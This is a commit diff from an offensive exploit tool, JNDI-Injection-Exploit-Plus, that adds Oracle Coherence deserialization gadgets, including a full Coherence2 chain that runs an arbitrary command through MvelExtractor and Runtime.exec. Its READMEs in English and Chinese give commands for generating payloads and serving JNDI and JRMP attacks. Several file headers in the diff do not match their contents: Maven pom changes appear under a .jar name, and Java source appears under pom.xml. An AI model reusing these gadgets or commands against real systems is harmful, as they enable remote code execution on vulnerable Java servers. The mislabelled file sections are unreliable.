add some coherence gadgets

Author: cckuailong

README.md

@@ -1,5 +1,7 @@
 # JNDI-Injection-Exploit-Plus
 
+[中文 README](./README_zh.md)
+
 ## Description
 
 JNDI-Injection-Exploit-Plus is a tool for generating **workable JNDI links** and provide background services by starting RMI server,LDAP server and HTTP server. 
@@ -33,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
 Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
 Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
 
-#### 3. Deserailization Gadget (total: 51)
+#### 3. Deserailization Gadget (total: 54)
 
 P.S. More Gadgets (:arrow_up: ) than ysoserial, welcome to PR more! ^_^
 
@@ -44,7 +46,10 @@ BeanShell1          |@pwntester, @cschneider4711 |bsh:2.0b5
 C3P0                |@mbechler                   |c3p0:0.9.5.2, mchange-commons-java:0.2.11
 Click1              |@artsploit                  |click-nodeps:2.3.0, javax.servlet-api:3.1.0
 Clojure             |@JackOfMostTrades           |clojure:1.8.0
-Coherence :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
+Coherence1 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
+Coherence2 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
+Coherence3 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
+Coherence4 :arrow_up:           |@cckuailong                 |coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
 CommonsBeanutils1   |@frohoff                    |commons-beanutils:1.9.2
 CommonsBeanutils2 :arrow_up:   |@cckuailong                 |commons-beanutils:1.9.2
 CommonsCollections1 |@frohoff                    |commons-collections:3.1
@@ -104,7 +109,7 @@ You can generate the deserialization payloads with binary or base64 type of outp
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -134,7 +139,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
+$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
 ```
 
 where:
@@ -152,13 +157,13 @@ where:
 - JRMPListener
 
 ```shell
-java -cp JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 ## Examples
@@ -170,7 +175,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -201,7 +206,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:

README_zh.md

@@ -0,0 +1,114 @@
+# JNDI-Injection-Exploit-Plus
+
+[English README](./README.md)
+
+JNDI-Injection-Exploit-Plus改写自welk1n大佬的JNDI-Injection-Exploit项目。
+
+## 详细说明
+
+### 是一款JNDI注入利用工具，可以生成JNDI链接并启动后端相关服务。
+
+根据JNDI的三种触发点，提供3种JNDI利用方式
+
+- 远程Reference链 （3种）
+- 本地Reference链 （4种）
+- 反序列化链（54种）
+
+P.S. 具体利用链名称及依赖见 [表格](./README.md)
+
+#### 使用方法
+
+```
+$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+```
+
+#### 参数说明
+
+```
+-C - 要执行的命令.
+
+(可选 , 默认命令 "open /Applications/Calculator.app")
+
+-A - 运行此工具的主机IP地址.
+
+(可选 , 默认是第一个网卡的地址)
+```
+
+#### 示例
+
+1. 运行工具
+
+```
+$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+```
+
+![](./img/1.png)
+
+2. 触发JNDI注入
+
+```
+class Test{
+    public static void main(String[] args) throws Exception{
+        InitialContext ctx = new InitialContext();
+        ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
+    }
+}
+```
+
+![](./img/2.png)
+
+### 是一款反序列化Payload生成工具
+
+包含50+ Gadgets链，比ysoserial还多出10+，后续会持续补充，欢迎大家一起来提交。
+
+#### 使用方法
+
+```
+$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
+```
+
+#### 参数说明
+
+```
+-C - 要执行的命令.
+
+(可选 , 默认命令 "open /Applications/Calculator.app")
+
+-D - 要生成的反序列化链名字，见Github列表.
+
+-O - (可选) 输出格式，base64或二进制, 默认是二进制
+```
+
+#### 示例
+
+1. 普通
+
+```
+$ java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+```
+
+![](./img/3.png)
+
+2. JRMP
+
+- JRMPListener
+```
+java -cp JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+```
+
+- JRMPClient
+```
+java -jar JNDI-Injection-Exploit-Plus-1.4-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+```
+
+## 总结
+
+JNDI-Injection-Exploit-Plus 主要有JNDI注入和生成反序列化链 2个用途，其中包含的利用链更多。详情请移步项目地址：https://github.com/cckuailong/JNDI-Injection-Exploit-Plus
+
+喜欢的同学别忘了点个star。 ^_^
+
+## 参考链接
+
+- https://github.com/cckuailong/JNDI-Injection-Exploit-Plus
+- https://github.com/welk1n/JNDI-Injection-Exploit
+- https://github.com/frohoff/ysoserial

libs/coherence-rest.jar

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.5-SNAPSHOT</version>
+    <version>1.6-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -255,6 +255,16 @@
             <artifactId>coherence</artifactId>
             <version>12.2.1</version>
         </dependency>
+        <dependency>
+            <groupId>weblogic</groupId>
+            <artifactId>coherence-rest</artifactId>
+            <version>12.2.1</version>
+        </dependency>
+        <dependency>
+            <groupId>weblogic</groupId>
+            <artifactId>coherence-web</artifactId>
+            <version>12.2.1</version>
+        </dependency>
 
         <!-- test -->
         <dependency>
@@ -362,7 +372,7 @@
                         </goals>
                     </execution>
                     <execution>
-                        <id>install-coherence</id>
+                        <id>install-coherence1</id>
                         <phase>clean</phase>
                         <configuration>
                             <file>${basedir}/libs/coherence.jar</file>
@@ -377,6 +387,38 @@
                             <goal>install-file</goal>
                         </goals>
                     </execution>
+                    <execution>
+                        <id>install-coherence2</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/coherence-rest.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>weblogic</groupId>
+                            <artifactId>coherence-rest</artifactId>
+                            <version>12.2.1</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
+                    <execution>
+                        <id>install-coherence4</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/coherence-web.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>weblogic</groupId>
+                            <artifactId>coherence-web</artifactId>
+                            <version>12.2.1</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
                 </executions>
             </plugin>
         </plugins>

libs/coherence-web.jar

@@ -2,8 +2,6 @@
 
 import payloads.*;
 
-import java.net.URL;
-
 public class CommonDeserial {
     private String command;
 
@@ -66,8 +64,17 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
             case "Clojure":
                 bytes = Clojure.getBytes(command);
                 break;
-            case "Coherence":
-                bytes = Coherence.getBytes(command);
+            case "Coherence1":
+                bytes = Coherence1.getBytes(command);
+                break;
+            case "Coherence2":
+                bytes = Coherence2.getBytes(command);
+                break;
+            case "Coherence3":
+                bytes = Coherence3.getBytes(command);
+                break;
+            case "Coherence4":
+                bytes = Coherence4.getBytes(command);
                 break;
             case "FileUpload1":
                 bytes = FileUpload1.getBytes(command);

libs/coherence.jar

@@ -11,6 +11,8 @@
 import javax.management.BadAttributeValueExpException;
 import java.lang.reflect.Field;
 
+// CVE-2020-2555
+
 /*
  * gadget:
  *      BadAttributeValueExpException.readObject()
@@ -24,7 +26,7 @@
 
 @Dependencies({"coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0"})
 @Authors({ Authors.CCKUAILONG })
-public class Coherence extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
+public class Coherence1 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
 
 	public BadAttributeValueExpException getObject(final String command) throws Exception {
 		ValueExtractor[] valueExtractors = new ValueExtractor[]{
@@ -53,11 +55,11 @@ public BadAttributeValueExpException getObject(final String command) throws Exce
 	}
 
 	public static byte[] getBytes(final String command) throws Exception {
-		return PayloadRunner.run(Coherence.class, command);
+		return PayloadRunner.run(Coherence1.class, command);
 	}
 
 	public static void main(final String command) throws Exception {
-		PayloadRunner.run(Coherence.class, command);
+		PayloadRunner.run(Coherence1.class, command);
 	}
 
 }

pom.xml

@@ -0,0 +1,51 @@
+package payloads;
+
+import com.tangosol.coherence.rest.util.extractor.MvelExtractor;
+import com.tangosol.util.filter.LimitFilter;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+import javax.management.BadAttributeValueExpException;
+import java.lang.reflect.Field;
+
+/*
+ * gadget:
+ *      BadAttributeValueExpException.readObject()
+ *          com.tangosol.util.filter.LimitFilter.toString()
+ *              com.tangosol.coherence.rest.util.extractor.MvelExtractor;
+ */
+
+@Dependencies({"coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0"})
+@Authors({ Authors.CCKUAILONG })
+public class Coherence2 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
+
+	public BadAttributeValueExpException getObject(final String command) throws Exception {
+		MvelExtractor mvelExtractor = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\""+command+"\")");
+		//初始化LimitFiler类实例
+		LimitFilter limitFilter = new LimitFilter();
+		limitFilter.setTopAnchor(Runtime.class);
+		BadAttributeValueExpException expException = new BadAttributeValueExpException(null);
+		Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
+		m_comparator.setAccessible(true);
+		m_comparator.set(limitFilter, mvelExtractor);
+		Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
+		m_oAnchorTop.setAccessible(true);
+		m_oAnchorTop.set(limitFilter, Runtime.class);
+		//将limitFilter放入BadAttributeValueExpException的val属性中
+		Field val = expException.getClass().getDeclaredField("val");
+		val.setAccessible(true);
+		val.set(expException, limitFilter);
+
+		return expException;
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return PayloadRunner.run(Coherence2.class, command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Coherence2.class, command);
+	}
+
+}